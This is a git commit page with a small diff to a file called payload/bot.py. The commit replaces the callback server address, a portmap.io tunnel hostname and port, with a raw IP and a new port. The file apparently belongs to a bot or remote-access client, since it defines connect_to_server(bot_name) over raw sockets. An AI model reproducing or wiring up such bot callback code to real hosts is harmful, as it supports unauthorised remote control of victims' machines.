Update payload/bot.py
This commit is contained in:
parent
dd7221b9eb
commit
62d319ba43
@ -2,8 +2,8 @@ import socket
|
||||
import os
|
||||
import sys
|
||||
|
||||
SERVER_HOST = "jabarzad-34105.portmap.io" # Replace with server IP
|
||||
SERVER_PORT = 34105
|
||||
SERVER_HOST = "178.63.100.123" # Replace with server IP
|
||||
SERVER_PORT = 14006
|
||||
|
||||
|
||||
def connect_to_server(bot_name):
|
||||
|
Loading…
Reference in New Issue
Block a user